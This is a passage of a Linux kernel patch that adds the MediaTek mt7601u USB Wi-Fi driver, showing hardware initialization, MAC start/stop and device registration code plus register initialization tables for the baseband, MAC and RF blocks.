is so buggy it must have never + * triggered, so don't bother. + */ + if (!i) + dev_err(dev->dev, "Error: PLL and XTAL check failed!\n"); +} + +static void mt7601u_chip_onoff(struct mt7601u_dev *dev, bool enable, bool reset) +{ + u32 val; + + mutex_lock(&dev->hw_atomic_mutex); + + val = mt7601u_rr(dev, MT_WLAN_FUN_CTRL); + + if (reset) { + val |= MT_WLAN_FUN_CTRL_GPIO_OUT_EN; + val &= ~MT_WLAN_FUN_CTRL_FRC_WL_ANT_SEL; + + if (val & MT_WLAN_FUN_CTRL_WLAN_EN) { + val |= (MT_WLAN_FUN_CTRL_WLAN_RESET | + MT_WLAN_FUN_CTRL_WLAN_RESET_RF); + mt7601u_wr(dev, MT_WLAN_FUN_CTRL, val); + udelay(20); + + val &= ~(MT_WLAN_FUN_CTRL_WLAN_RESET | + MT_WLAN_FUN_CTRL_WLAN_RESET_RF); + } + } + + mt7601u_wr(dev, MT_WLAN_FUN_CTRL, val); + udelay(20); + + mt7601u_set_wlan_state(dev, val, enable); + + mutex_unlock(&dev->hw_atomic_mutex); +} + +static void mt7601u_reset_csr_bbp(struct mt7601u_dev *dev) +{ + mt7601u_wr(dev, MT_MAC_SYS_CTRL, (MT_MAC_SYS_CTRL_RESET_CSR | + MT_MAC_SYS_CTRL_RESET_BBP)); + mt7601u_wr(dev, MT_USB_DMA_CFG, 0); + msleep(1); + mt7601u_wr(dev, MT_MAC_SYS_CTRL, 0); +} + +static void mt7601u_init_usb_dma(struct mt7601u_dev *dev) +{ + u32 val; + + val = MT76_SET(MT_USB_DMA_CFG_RX_BULK_AGG_TOUT, MT_USB_AGGR_TIMEOUT) | + MT76_SET(MT_USB_DMA_CFG_RX_BULK_AGG_LMT, MT_USB_AGGR_SIZE_LIMIT) | + MT_USB_DMA_CFG_RX_BULK_EN | + MT_USB_DMA_CFG_TX_BULK_EN; + if (dev->in_max_packet == 512) + val |= MT_USB_DMA_CFG_RX_BULK_AGG_EN; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); + + val |= MT_USB_DMA_CFG_UDMA_RX_WL_DROP; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); + val &= ~MT_USB_DMA_CFG_UDMA_RX_WL_DROP; + mt7601u_wr(dev, MT_USB_DMA_CFG, val); +} + +static int mt7601u_init_bbp(struct mt7601u_dev *dev) +{ + int ret; + + ret = mt7601u_wait_bbp_ready(dev); + if (ret) + return ret; + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, bbp_common_vals, + ARRAY_SIZE(bbp_common_vals)); + if (ret) + return ret; + + return mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_BBP, bbp_chip_vals, + 
ARRAY_SIZE(bbp_chip_vals)); +} + +static void +mt76_init_beacon_offsets(struct mt7601u_dev *dev) +{ + u16 base = MT_BEACON_BASE; + u32 regs[4] = {}; + int i; + + for (i = 0; i < 16; i++) { + u16 addr = dev->beacon_offsets[i]; + + regs[i / 4] |= ((addr - base) / 64) << (8 * (i % 4)); + } + + for (i = 0; i < 4; i++) + mt7601u_wr(dev, MT_BCN_OFFSET(i), regs[i]); +} + +static int mt7601u_write_mac_initvals(struct mt7601u_dev *dev) +{ + int ret; + + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_WLAN, mac_common_vals, + ARRAY_SIZE(mac_common_vals)); + if (ret) + return ret; + ret = mt7601u_write_reg_pairs(dev, MT_MCU_MEMMAP_WLAN, + mac_chip_vals, ARRAY_SIZE(mac_chip_vals)); + if (ret) + return ret; + + mt76_init_beacon_offsets(dev); + + mt7601u_wr(dev, MT_AUX_CLK_CFG, 0); + + return 0; +} + +static int mt7601u_init_wcid_mem(struct mt7601u_dev *dev) +{ + u32 *vals; + int i, ret; + + vals = kmalloc(sizeof(*vals) * N_WCIDS * 2, GFP_KERNEL); + if (!vals) + return -ENOMEM; + + for (i = 0; i < N_WCIDS; i++) { + vals[i * 2] = 0xffffffff; + vals[i * 2 + 1] = 0x00ffffff; + } + + ret = mt7601u_burst_write_regs(dev, MT_WCID_ADDR_BASE, + vals, N_WCIDS * 2); + kfree(vals); + + return ret; +} + +static int mt7601u_init_key_mem(struct mt7601u_dev *dev) +{ + u32 vals[4] = {}; + + return mt7601u_burst_write_regs(dev, MT_SKEY_MODE_BASE_0, + vals, ARRAY_SIZE(vals)); +} + +static int mt7601u_init_wcid_attr_mem(struct mt7601u_dev *dev) +{ + u32 *vals; + int i, ret; + + vals = kmalloc(sizeof(*vals) * N_WCIDS * 2, GFP_KERNEL); + if (!vals) + return -ENOMEM; + + for (i = 0; i < N_WCIDS * 2; i++) + vals[i] = 1; + + ret = mt7601u_burst_write_regs(dev, MT_WCID_ATTR_BASE, + vals, N_WCIDS * 2); + kfree(vals); + + return ret; +} + +static void mt7601u_reset_counters(struct mt7601u_dev *dev) +{ + mt7601u_rr(dev, MT_RX_STA_CNT0); + mt7601u_rr(dev, MT_RX_STA_CNT1); + mt7601u_rr(dev, MT_RX_STA_CNT2); + mt7601u_rr(dev, MT_TX_STA_CNT0); + mt7601u_rr(dev, MT_TX_STA_CNT1); + mt7601u_rr(dev, MT_TX_STA_CNT2); +} + +int mt7601u_mac_start(struct mt7601u_dev *dev) +{ + mt7601u_wr(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_ENABLE_TX); + + if (!mt76_poll(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_BUSY | + MT_WPDMA_GLO_CFG_RX_DMA_BUSY, 0, 200000)) + return -ETIMEDOUT; + + dev->rxfilter = MT_RX_FILTR_CFG_CRC_ERR | + MT_RX_FILTR_CFG_PHY_ERR | MT_RX_FILTR_CFG_PROMISC | + MT_RX_FILTR_CFG_VER_ERR | MT_RX_FILTR_CFG_DUP | + MT_RX_FILTR_CFG_CFACK | MT_RX_FILTR_CFG_CFEND | + MT_RX_FILTR_CFG_ACK | MT_RX_FILTR_CFG_CTS | + MT_RX_FILTR_CFG_RTS | MT_RX_FILTR_CFG_PSPOLL | + MT_RX_FILTR_CFG_BA | MT_RX_FILTR_CFG_CTRL_RSV; + mt7601u_wr(dev, MT_RX_FILTR_CFG, dev->rxfilter); + + mt7601u_wr(dev, MT_MAC_SYS_CTRL, + MT_MAC_SYS_CTRL_ENABLE_TX | MT_MAC_SYS_CTRL_ENABLE_RX); + + if (!mt76_poll(dev, MT_WPDMA_GLO_CFG, MT_WPDMA_GLO_CFG_TX_DMA_BUSY | + MT_WPDMA_GLO_CFG_RX_DMA_BUSY, 0, 50)) + return -ETIMEDOUT; + + return 0; +} + +static void mt7601u_mac_stop_hw(struct mt7601u_dev *dev) +{ + int i, ok; + + if (test_bit(MT7601U_STATE_REMOVED, &dev->state)) + return; + + mt76_clear(dev, MT_BEACON_TIME_CFG, MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | MT_BEACON_TIME_CFG_TBTT_EN | + MT_BEACON_TIME_CFG_BEACON_TX); + + if (!mt76_poll(dev, MT_USB_DMA_CFG, MT_USB_DMA_CFG_TX_BUSY, 0, 1000)) + dev_warn(dev->dev, "Warning: TX DMA did not stop!\n"); + + /* Page count on TxQ */ + i = 200; + while (i-- && ((mt76_rr(dev, 0x0438) & 0xffffffff) || + (mt76_rr(dev, 0x0a30) & 0x000000ff) || + (mt76_rr(dev, 0x0a34) & 0x00ff00ff))) + msleep(10); + + if (!mt76_poll(dev, 
MT_MAC_STATUS, MT_MAC_STATUS_TX, 0, 1000)) + dev_warn(dev->dev, "Warning: MAC TX did not stop!\n"); + + mt76_clear(dev, MT_MAC_SYS_CTRL, MT_MAC_SYS_CTRL_ENABLE_RX | + MT_MAC_SYS_CTRL_ENABLE_TX); + + /* Page count on RxQ */ + ok = 0; + i = 200; + while (i--) { + if ((mt76_rr(dev, 0x0430) & 0x00ff0000) || + (mt76_rr(dev, 0x0a30) & 0xffffffff) || + (mt76_rr(dev, 0x0a34) & 0xffffffff)) + ok++; + if (ok > 6) + break; + + msleep(1); + } + + if (!mt76_poll(dev, MT_MAC_STATUS, MT_MAC_STATUS_RX, 0, 1000)) + dev_warn(dev->dev, "Warning: MAC RX did not stop!\n"); + + if (!mt76_poll(dev, MT_USB_DMA_CFG, MT_USB_DMA_CFG_RX_BUSY, 0, 1000)) + dev_warn(dev->dev, "Warning: RX DMA did not stop!\n"); +} + +void mt7601u_mac_stop(struct mt7601u_dev *dev) +{ + mt7601u_mac_stop_hw(dev); + flush_delayed_work(&dev->stat_work); + cancel_delayed_work_sync(&dev->stat_work); +} + +static void mt7601u_stop_hardware(struct mt7601u_dev *dev) +{ + mt7601u_chip_onoff(dev, false, false); +} + +int mt7601u_init_hardware(struct mt7601u_dev *dev) +{ + static const u16 beacon_offsets[16] = { + /* 512 byte per beacon */ + 0xc000, 0xc200, 0xc400, 0xc600, + 0xc800, 0xca00, 0xcc00, 0xce00, + 0xd000, 0xd200, 0xd400, 0xd600, + 0xd800, 0xda00, 0xdc00, 0xde00 + }; + int ret; + + dev->beacon_offsets = beacon_offsets; + + mt7601u_chip_onoff(dev, true, false); + + ret = mt7601u_wait_asic_ready(dev); + if (ret) + goto err; + ret = mt7601u_mcu_init(dev); + if (ret) + goto err; + + if (!mt76_poll_msec(dev, MT_WPDMA_GLO_CFG, + MT_WPDMA_GLO_CFG_TX_DMA_BUSY | + MT_WPDMA_GLO_CFG_RX_DMA_BUSY, 0, 100)) { + ret = -EIO; + goto err; + } + + /* Wait for ASIC ready after FW load. */ + ret = mt7601u_wait_asic_ready(dev); + if (ret) + goto err; + + mt7601u_reset_csr_bbp(dev); + mt7601u_init_usb_dma(dev); + + ret = mt7601u_mcu_cmd_init(dev); + if (ret) + goto err; + ret = mt7601u_dma_init(dev); + if (ret) + goto err_mcu; + ret = mt7601u_write_mac_initvals(dev); + if (ret) + goto err_rx; + + if (!mt76_poll_msec(dev, MT_MAC_STATUS, + MT_MAC_STATUS_TX | MT_MAC_STATUS_RX, 0, 100)) { + ret = -EIO; + goto err_rx; + } + + ret = mt7601u_init_bbp(dev); + if (ret) + goto err_rx; + ret = mt7601u_init_wcid_mem(dev); + if (ret) + goto err_rx; + ret = mt7601u_init_key_mem(dev); + if (ret) + goto err_rx; + ret = mt7601u_init_wcid_attr_mem(dev); + if (ret) + goto err_rx; + + mt76_clear(dev, MT_BEACON_TIME_CFG, (MT_BEACON_TIME_CFG_TIMER_EN | + MT_BEACON_TIME_CFG_SYNC_MODE | + MT_BEACON_TIME_CFG_TBTT_EN | + MT_BEACON_TIME_CFG_BEACON_TX)); + + mt7601u_reset_counters(dev); + + mt7601u_rmw(dev, MT_US_CYC_CFG, MT_US_CYC_CNT, 0x1e); + + mt7601u_wr(dev, MT_TXOP_CTRL_CFG, MT76_SET(MT_TXOP_TRUN_EN, 0x3f) | + MT76_SET(MT_TXOP_EXT_CCA_DLY, 0x58)); + + ret = mt7601u_eeprom_init(dev); + if (ret) + goto err_rx; + + ret = mt7601u_phy_init(dev); + if (ret) + goto err_rx; + + mt7601u_set_rx_path(dev, 0); + mt7601u_set_tx_dac(dev, 0); + + mt7601u_mac_set_ctrlch(dev, false); + mt7601u_bbp_set_ctrlch(dev, false); + mt7601u_bbp_set_bw(dev, MT_BW_20); + + return 0; + +err_rx: + mt7601u_dma_cleanup(dev); +err_mcu: + mt7601u_mcu_cmd_deinit(dev); +err: + mt7601u_chip_onoff(dev, false, false); + return ret; +} + +void mt7601u_cleanup(struct mt7601u_dev *dev) +{ + mt7601u_stop_hardware(dev); + mt7601u_dma_cleanup(dev); + mt7601u_mcu_cmd_deinit(dev); +} + +struct mt7601u_dev *mt7601u_alloc_device(struct device *pdev) +{ + struct ieee80211_hw *hw; + struct mt7601u_dev *dev; + + hw = ieee80211_alloc_hw(sizeof(*dev), &mt7601u_ops); + if (!hw) + return NULL; + + dev = hw->priv; + dev->dev = pdev; + 
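The allocation just above relies on mac80211's private-area embedding: ieee80211_alloc_hw(sizeof(*dev), &mt7601u_ops) reserves sizeof(struct mt7601u_dev) bytes of driver-private space behind the ieee80211_hw, so dev is simply hw->priv and the two are allocated and freed together (see the ieee80211_free_hw() call in the error path a few lines below). A minimal standalone sketch of the same pattern, using hypothetical my_dev/my_ops names rather than anything from this driver:

#include <net/mac80211.h>

struct my_dev {
	struct ieee80211_hw *hw;	/* back-pointer into the same allocation */
	struct device *parent;
};

static const struct ieee80211_ops my_ops = {
	/* .tx, .start, .stop, ... assumed to be filled in elsewhere */
};

static struct my_dev *my_alloc_device(struct device *parent)
{
	struct ieee80211_hw *hw;
	struct my_dev *m;

	hw = ieee80211_alloc_hw(sizeof(struct my_dev), &my_ops);
	if (!hw)
		return NULL;

	m = hw->priv;		/* points at the trailing private area */
	m->hw = hw;
	m->parent = parent;
	return m;
}
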
dev->hw = hw; + mutex_init(&dev->vendor_req_mutex); + mutex_init(&dev->reg_atomic_mutex); + mutex_init(&dev->hw_atomic_mutex); + mutex_init(&dev->mutex); + spin_lock_init(&dev->tx_lock); + spin_lock_init(&dev->rx_lock); + spin_lock_init(&dev->lock); + spin_lock_init(&dev->con_mon_lock); + atomic_set(&dev->avg_ampdu_len, 1); + + dev->stat_wq = alloc_workqueue("mt7601u", WQ_UNBOUND, 0); + if (!dev->stat_wq) { + ieee80211_free_hw(hw); + return NULL; + } + + return dev; +} + +#define CHAN2G(_idx, _freq) { \ + .band = IEEE80211_BAND_2GHZ, \ + .center_freq = (_freq), \ + .hw_value = (_idx), \ + .max_power = 30, \ +} + +static const struct ieee80211_channel mt76_channels_2ghz[] = { + CHAN2G(1, 2412), + CHAN2G(2, 2417), + CHAN2G(3, 2422), + CHAN2G(4, 2427), + CHAN2G(5, 2432), + CHAN2G(6, 2437), + CHAN2G(7, 2442), + CHAN2G(8, 2447), + CHAN2G(9, 2452), + CHAN2G(10, 2457), + CHAN2G(11, 2462), + CHAN2G(12, 2467), + CHAN2G(13, 2472), + CHAN2G(14, 2484), +}; + +#define CCK_RATE(_idx, _rate) { \ + .bitrate = _rate, \ + .flags = IEEE80211_RATE_SHORT_PREAMBLE, \ + .hw_value = (MT_PHY_TYPE_CCK << 8) | _idx, \ + .hw_value_short = (MT_PHY_TYPE_CCK << 8) | (8 + _idx), \ +} + +#define OFDM_RATE(_idx, _rate) { \ + .bitrate = _rate, \ + .hw_value = (MT_PHY_TYPE_OFDM << 8) | _idx, \ + .hw_value_short = (MT_PHY_TYPE_OFDM << 8) | _idx, \ +} + +static struct ieee80211_rate mt76_rates[] = { + CCK_RATE(0, 10), + CCK_RATE(1, 20), + CCK_RATE(2, 55), + CCK_RATE(3, 110), + OFDM_RATE(0, 60), + OFDM_RATE(1, 90), + OFDM_RATE(2, 120), + OFDM_RATE(3, 180), + OFDM_RATE(4, 240), + OFDM_RATE(5, 360), + OFDM_RATE(6, 480), + OFDM_RATE(7, 540), +}; + +static int +mt76_init_sband(struct mt7601u_dev *dev, struct ieee80211_supported_band *sband, + const struct ieee80211_channel *chan, int n_chan, + struct ieee80211_rate *rates, int n_rates) +{ + struct ieee80211_sta_ht_cap *ht_cap; + void *chanlist; + int size; + + size = n_chan * sizeof(*chan); + chanlist = devm_kmemdup(dev->dev, chan, size, GFP_KERNEL); + if (!chanlist) + return -ENOMEM; + + sband->channels = chanlist; + sband->n_channels = n_chan; + sband->bitrates = rates; + sband->n_bitrates = n_rates; + + ht_cap = &sband->ht_cap; + ht_cap->ht_supported = true; + ht_cap->cap = IEEE80211_HT_CAP_SUP_WIDTH_20_40 | + IEEE80211_HT_CAP_GRN_FLD | + IEEE80211_HT_CAP_SGI_20 | + IEEE80211_HT_CAP_SGI_40 | + (1 << IEEE80211_HT_CAP_RX_STBC_SHIFT); + + ht_cap->mcs.rx_mask[0] = 0xff; + ht_cap->mcs.rx_mask[4] = 0x1; + ht_cap->mcs.tx_params = IEEE80211_HT_MCS_TX_DEFINED; + ht_cap->ampdu_factor = IEEE80211_HT_MAX_AMPDU_64K; + ht_cap->ampdu_density = IEEE80211_HT_MPDU_DENSITY_2; + + dev->chandef.chan = &sband->channels[0]; + + return 0; +} + +static int +mt76_init_sband_2g(struct mt7601u_dev *dev) +{ + dev->sband_2g = devm_kzalloc(dev->dev, sizeof(*dev->sband_2g), + GFP_KERNEL); + dev->hw->wiphy->bands[IEEE80211_BAND_2GHZ] = dev->sband_2g; + + WARN_ON(dev->ee->reg.start - 1 + dev->ee->reg.num > + ARRAY_SIZE(mt76_channels_2ghz)); + + return mt76_init_sband(dev, dev->sband_2g, + &mt76_channels_2ghz[dev->ee->reg.start - 1], + dev->ee->reg.num, + mt76_rates, ARRAY_SIZE(mt76_rates)); +} + +int mt7601u_register_device(struct mt7601u_dev *dev) +{ + struct ieee80211_hw *hw = dev->hw; + struct wiphy *wiphy = hw->wiphy; + int ret; + + /* Reserve WCID 0 for mcast - thanks to this APs WCID will go to + * entry no. 1 like it does in the vendor driver. 
+ */ + dev->wcid_mask[0] |= 1; + + /* init fake wcid for monitor interfaces */ + dev->mon_wcid = devm_kmalloc(dev->dev, sizeof(*dev->mon_wcid), + GFP_KERNEL); + if (!dev->mon_wcid) + return -ENOMEM; + dev->mon_wcid->idx = 0xff; + dev->mon_wcid->hw_key_idx = -1; + + SET_IEEE80211_DEV(hw, dev->dev); + + hw->queues = 4; + hw->flags = IEEE80211_HW_SIGNAL_DBM | + IEEE80211_HW_PS_NULLFUNC_STACK | + IEEE80211_HW_SUPPORTS_HT_CCK_RATES | + IEEE80211_HW_AMPDU_AGGREGATION | + IEEE80211_HW_SUPPORTS_RC_TABLE; + hw->max_rates = 1; + hw->max_report_rates = 7; + hw->max_rate_tries = 1; + + hw->sta_data_size = sizeof(struct mt76_sta); + hw->vif_data_size = sizeof(struct mt76_vif); + + SET_IEEE80211_PERM_ADDR(hw, dev->macaddr); + + wiphy->features |= NL80211_FEATURE_ACTIVE_MONITOR; + wiphy->interface_modes = BIT(NL80211_IFTYPE_STATION); + + ret = mt76_init_sband_2g(dev); + if (ret) + return ret; + + INIT_DELAYED_WORK(&dev->mac_work, mt7601u_mac_work); + INIT_DELAYED_WORK(&dev->stat_work, mt7601u_tx_stat); + + ret = ieee80211_register_hw(hw); + if (ret) + return ret; + + mt7601u_init_debugfs(dev); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/initvals.h b/drivers/net/wireless/mediatek/mt7601u/initvals.h new file mode 100644 index 000000000000..ec11ff66969d --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/initvals.h @@ -0,0 +1,164 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_INITVALS_H +#define __MT7601U_INITVALS_H + +static const struct mt76_reg_pair bbp_common_vals[] = { + { 65, 0x2c }, + { 66, 0x38 }, + { 68, 0x0b }, + { 69, 0x12 }, + { 70, 0x0a }, + { 73, 0x10 }, + { 81, 0x37 }, + { 82, 0x62 }, + { 83, 0x6a }, + { 84, 0x99 }, + { 86, 0x00 }, + { 91, 0x04 }, + { 92, 0x00 }, + { 103, 0x00 }, + { 105, 0x05 }, + { 106, 0x35 }, +}; + +static const struct mt76_reg_pair bbp_chip_vals[] = { + { 1, 0x04 }, { 4, 0x40 }, { 20, 0x06 }, { 31, 0x08 }, + /* CCK Tx Control */ + { 178, 0xff }, + /* AGC/Sync controls */ + { 66, 0x14 }, { 68, 0x8b }, { 69, 0x12 }, { 70, 0x09 }, + { 73, 0x11 }, { 75, 0x60 }, { 76, 0x44 }, { 84, 0x9a }, + { 86, 0x38 }, { 91, 0x07 }, { 92, 0x02 }, + /* Rx Path Controls */ + { 99, 0x50 }, { 101, 0x00 }, { 103, 0xc0 }, { 104, 0x92 }, + { 105, 0x3c }, { 106, 0x03 }, { 128, 0x12 }, + /* Change RXWI content: Gain Report */ + { 142, 0x04 }, { 143, 0x37 }, + /* Change RXWI content: Antenna Report */ + { 142, 0x03 }, { 143, 0x99 }, + /* Calibration Index Register */ + /* CCK Receiver Control */ + { 160, 0xeb }, { 161, 0xc4 }, { 162, 0x77 }, { 163, 0xf9 }, + { 164, 0x88 }, { 165, 0x80 }, { 166, 0xff }, { 167, 0xe4 }, + /* Added AGC controls - these AGC/GLRT registers are accessed + * through R195 and R196. 
+ */ + { 195, 0x00 }, { 196, 0x00 }, + { 195, 0x01 }, { 196, 0x04 }, + { 195, 0x02 }, { 196, 0x20 }, + { 195, 0x03 }, { 196, 0x0a }, + { 195, 0x06 }, { 196, 0x16 }, + { 195, 0x07 }, { 196, 0x05 }, + { 195, 0x08 }, { 196, 0x37 }, + { 195, 0x0a }, { 196, 0x15 }, + { 195, 0x0b }, { 196, 0x17 }, + { 195, 0x0c }, { 196, 0x06 }, + { 195, 0x0d }, { 196, 0x09 }, + { 195, 0x0e }, { 196, 0x05 }, + { 195, 0x0f }, { 196, 0x09 }, + { 195, 0x10 }, { 196, 0x20 }, + { 195, 0x20 }, { 196, 0x17 }, + { 195, 0x21 }, { 196, 0x06 }, + { 195, 0x22 }, { 196, 0x09 }, + { 195, 0x23 }, { 196, 0x17 }, + { 195, 0x24 }, { 196, 0x06 }, + { 195, 0x25 }, { 196, 0x09 }, + { 195, 0x26 }, { 196, 0x17 }, + { 195, 0x27 }, { 196, 0x06 }, + { 195, 0x28 }, { 196, 0x09 }, + { 195, 0x29 }, { 196, 0x05 }, + { 195, 0x2a }, { 196, 0x09 }, + { 195, 0x80 }, { 196, 0x8b }, + { 195, 0x81 }, { 196, 0x12 }, + { 195, 0x82 }, { 196, 0x09 }, + { 195, 0x83 }, { 196, 0x17 }, + { 195, 0x84 }, { 196, 0x11 }, + { 195, 0x85 }, { 196, 0x00 }, + { 195, 0x86 }, { 196, 0x00 }, + { 195, 0x87 }, { 196, 0x18 }, + { 195, 0x88 }, { 196, 0x60 }, + { 195, 0x89 }, { 196, 0x44 }, + { 195, 0x8a }, { 196, 0x8b }, + { 195, 0x8b }, { 196, 0x8b }, + { 195, 0x8c }, { 196, 0x8b }, + { 195, 0x8d }, { 196, 0x8b }, + { 195, 0x8e }, { 196, 0x09 }, + { 195, 0x8f }, { 196, 0x09 }, + { 195, 0x90 }, { 196, 0x09 }, + { 195, 0x91 }, { 196, 0x09 }, + { 195, 0x92 }, { 196, 0x11 }, + { 195, 0x93 }, { 196, 0x11 }, + { 195, 0x94 }, { 196, 0x11 }, + { 195, 0x95 }, { 196, 0x11 }, + /* PPAD */ + { 47, 0x80 }, { 60, 0x80 }, { 150, 0xd2 }, { 151, 0x32 }, + { 152, 0x23 }, { 153, 0x41 }, { 154, 0x00 }, { 155, 0x4f }, + { 253, 0x7e }, { 195, 0x30 }, { 196, 0x32 }, { 195, 0x31 }, + { 196, 0x23 }, { 195, 0x32 }, { 196, 0x45 }, { 195, 0x35 }, + { 196, 0x4a }, { 195, 0x36 }, { 196, 0x5a }, { 195, 0x37 }, + { 196, 0x5a }, +}; + +static const struct mt76_reg_pair mac_common_vals[] = { + { MT_LEGACY_BASIC_RATE, 0x0000013f }, + { MT_HT_BASIC_RATE, 0x00008003 }, + { MT_MAC_SYS_CTRL, 0x00000000 }, + { MT_RX_FILTR_CFG, 0x00017f97 }, + { MT_BKOFF_SLOT_CFG, 0x00000209 }, + { MT_TX_SW_CFG0, 0x00000000 }, + { MT_TX_SW_CFG1, 0x00080606 }, + { MT_TX_LINK_CFG, 0x00001020 }, + { MT_TX_TIMEOUT_CFG, 0x000a2090 }, + { MT_MAX_LEN_CFG, 0x00003fff }, + { MT_PBF_TX_MAX_PCNT, 0x1fbf1f1f }, + { MT_PBF_RX_MAX_PCNT, 0x0000009f }, + { MT_TX_RETRY_CFG, 0x47d01f0f }, + { MT_AUTO_RSP_CFG, 0x00000013 }, + { MT_CCK_PROT_CFG, 0x05740003 }, + { MT_OFDM_PROT_CFG, 0x05740003 }, + { MT_MM40_PROT_CFG, 0x03f44084 }, + { MT_GF20_PROT_CFG, 0x01744004 }, + { MT_GF40_PROT_CFG, 0x03f44084 }, + { MT_MM20_PROT_CFG, 0x01744004 }, + { MT_TXOP_CTRL_CFG, 0x0000583f }, + { MT_TX_RTS_CFG, 0x01092b20 }, + { MT_EXP_ACK_TIME, 0x002400ca }, + { MT_TXOP_HLDR_ET, 0x00000002 }, + { MT_XIFS_TIME_CFG, 0x33a41010 }, + { MT_PWR_PIN_CFG, 0x00000000 }, +}; + +static const struct mt76_reg_pair mac_chip_vals[] = { + { MT_TSO_CTRL, 0x00006050 }, + { MT_BCN_OFFSET(0), 0x18100800 }, + { MT_BCN_OFFSET(1), 0x38302820 }, + { MT_PBF_SYS_CTRL, 0x00080c00 }, + { MT_PBF_CFG, 0x7f723c1f }, + { MT_FCE_PSE_CTRL, 0x00000001 }, + { MT_PAUSE_ENABLE_CONTROL1, 0x00000000 }, + { MT_TX0_RF_GAIN_CORR, 0x003b0005 }, + { MT_TX0_RF_GAIN_ATTEN, 0x00006900 }, + { MT_TX0_BB_GAIN_ATTEN, 0x00000400 }, + { MT_TX_ALC_VGA3, 0x00060006 }, + { MT_TX_SW_CFG0, 0x00000402 }, + { MT_TX_SW_CFG1, 0x00000000 }, + { MT_TX_SW_CFG2, 0x00000000 }, + { MT_HEADER_TRANS_CTRL_REG, 0x00000000 }, + { MT_FCE_CSO, 0x0000030f }, + { MT_FCE_PARAMETERS, 0x00256f0f }, +}; + +#endif diff --git 
a/drivers/net/wireless/mediatek/mt7601u/initvals_phy.h b/drivers/net/wireless/mediatek/mt7601u/initvals_phy.h new file mode 100644 index 000000000000..a2bdc3e322bf --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/initvals_phy.h @@ -0,0 +1,291 @@ +/* + * (c) Copyright 2002-2010, Ralink Technology, Inc. + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_PHY_INITVALS_H +#define __MT7601U_PHY_INITVALS_H + +#define RF_REG_PAIR(bank, reg, value) \ + { MT_MCU_MEMMAP_RF | (bank) << 16 | (reg), value } + +static const struct mt76_reg_pair rf_central[] = { + /* Bank 0 - for central blocks: BG, PLL, XTAL, LO, ADC/DAC */ + RF_REG_PAIR(0, 0, 0x02), + RF_REG_PAIR(0, 1, 0x01), + RF_REG_PAIR(0, 2, 0x11), + RF_REG_PAIR(0, 3, 0xff), + RF_REG_PAIR(0, 4, 0x0a), + RF_REG_PAIR(0, 5, 0x20), + RF_REG_PAIR(0, 6, 0x00), + /* B/G */ + RF_REG_PAIR(0, 7, 0x00), + RF_REG_PAIR(0, 8, 0x00), + RF_REG_PAIR(0, 9, 0x00), + RF_REG_PAIR(0, 10, 0x00), + RF_REG_PAIR(0, 11, 0x21), + /* XO */ + RF_REG_PAIR(0, 13, 0x00), /* 40mhz xtal */ + /* RF_REG_PAIR(0, 13, 0x13), */ /* 20mhz xtal */ + RF_REG_PAIR(0, 14, 0x7c), + RF_REG_PAIR(0, 15, 0x22), + RF_REG_PAIR(0, 16, 0x80), + /* PLL */ + RF_REG_PAIR(0, 17, 0x99), + RF_REG_PAIR(0, 18, 0x99), + RF_REG_PAIR(0, 19, 0x09), + RF_REG_PAIR(0, 20, 0x50), + RF_REG_PAIR(0, 21, 0xb0), + RF_REG_PAIR(0, 22, 0x00), + RF_REG_PAIR(0, 23, 0xc5), + RF_REG_PAIR(0, 24, 0xfc), + RF_REG_PAIR(0, 25, 0x40), + RF_REG_PAIR(0, 26, 0x4d), + RF_REG_PAIR(0, 27, 0x02), + RF_REG_PAIR(0, 28, 0x72), + RF_REG_PAIR(0, 29, 0x01), + RF_REG_PAIR(0, 30, 0x00), + RF_REG_PAIR(0, 31, 0x00), + /* test ports */ + RF_REG_PAIR(0, 32, 0x00), + RF_REG_PAIR(0, 33, 0x00), + RF_REG_PAIR(0, 34, 0x23), + RF_REG_PAIR(0, 35, 0x01), /* change setting to reduce spurs */ + RF_REG_PAIR(0, 36, 0x00), + RF_REG_PAIR(0, 37, 0x00), + /* ADC/DAC */ + RF_REG_PAIR(0, 38, 0x00), + RF_REG_PAIR(0, 39, 0x20), + RF_REG_PAIR(0, 40, 0x00), + RF_REG_PAIR(0, 41, 0xd0), + RF_REG_PAIR(0, 42, 0x1b), + RF_REG_PAIR(0, 43, 0x02), + RF_REG_PAIR(0, 44, 0x00), +}; + +static const struct mt76_reg_pair rf_channel[] = { + RF_REG_PAIR(4, 0, 0x01), + RF_REG_PAIR(4, 1, 0x00), + RF_REG_PAIR(4, 2, 0x00), + RF_REG_PAIR(4, 3, 0x00), + /* LDO */ + RF_REG_PAIR(4, 4, 0x00), + RF_REG_PAIR(4, 5, 0x08), + RF_REG_PAIR(4, 6, 0x00), + /* RX */ + RF_REG_PAIR(4, 7, 0x5b), + RF_REG_PAIR(4, 8, 0x52), + RF_REG_PAIR(4, 9, 0xb6), + RF_REG_PAIR(4, 10, 0x57), + RF_REG_PAIR(4, 11, 0x33), + RF_REG_PAIR(4, 12, 0x22), + RF_REG_PAIR(4, 13, 0x3d), + RF_REG_PAIR(4, 14, 0x3e), + RF_REG_PAIR(4, 15, 0x13), + RF_REG_PAIR(4, 16, 0x22), 